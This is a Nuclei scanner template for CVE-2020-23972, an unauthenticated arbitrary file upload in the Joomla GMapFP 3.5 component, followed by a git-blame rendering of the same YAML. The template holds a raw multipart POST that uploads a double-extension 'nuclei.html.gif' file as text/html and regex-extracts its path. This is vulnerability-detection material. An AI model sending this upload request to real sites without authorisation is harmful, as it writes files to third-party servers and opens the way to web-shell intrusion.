nuclei-templates/http/cves/2020/CVE-2020-23972.yaml

id: CVE-2020-23972

info:
  name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application
    without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.
  reference:
    - https://www.exploit-db.com/exploits/49129
    - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
    - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-23972
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-23972
    cwe-id: CWE-434
    epss-score: 0.68335
    cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:*
  metadata:
    max-request: 2
    framework: joomla\!
    vendor: gmapfp
    product: gmapfp
  tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive

http:
  - raw:
      - |
        POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: {{BaseURL}}
        Connection: close

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="option"

        com_gmapfp
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"
        Content-Type: text/html

        projectdiscovery

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="no_html"

        no_html
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS--

    payloads:
      component:
        - "com_gmapfp"
        - "comgmapfp"

    extractors:
      - type: regex
        regex:
          - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
        part: body
misc changes 2021-01-02 04:56:15 +00:00			`id: CVE-2020-23972`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00
			`info:`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00			`author: dwisiswant0`
			`severity: high`
			`description: \|`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application`
			`without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/49129`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md`
			`- http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-23972`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 7.5`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2020-23972`
			`cwe-id: CWE-434`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`epss-score: 0.68335`
			`cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5::::-:joomla\!::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`framework: joomla\!`
			`vendor: gmapfp`
			`product: gmapfp`
			`tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Payloads positional update to keep the request format uniform 2021-08-22 18:09:33 +00:00			`- raw:`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00			`- \|`
Tenda Template Enhancementleanup (#4257) * Replace § markers with {{ }} pairs * Clean up new Tenda admin panel template * Update tenda-11n-wireless-router-login.yaml Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-04-29 05:04:34 +00:00			`POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9`
			`Referer: {{BaseURL}}`
			`Connection: close`

			`------WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Content-Disposition: form-data; name="option"`

			`com_gmapfp`
			`------WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"`
			`Content-Type: text/html`

			`projectdiscovery`

			`------WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Content-Disposition: form-data; name="no_html"`

			`no_html`
			`------WebKitFormBoundarySHHbUsfCoxlX1bpS--`
Payloads positional update to keep the request format uniform 2021-08-22 18:09:33 +00:00
			`payloads:`
			`component:`
			`- "com_gmapfp"`
			`- "comgmapfp"`

:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00			`extractors:`
			`- type: regex`
			`regex:`
Tenda Template Enhancementleanup (#4257) * Replace § markers with {{ }} pairs * Clean up new Tenda admin panel template * Update tenda-11n-wireless-router-login.yaml Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-04-29 05:04:34 +00:00			`- "window\\.opener\\.(changeDisplayImage\|addphoto)\\(\"(.*?)\"\\);"`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`part: body`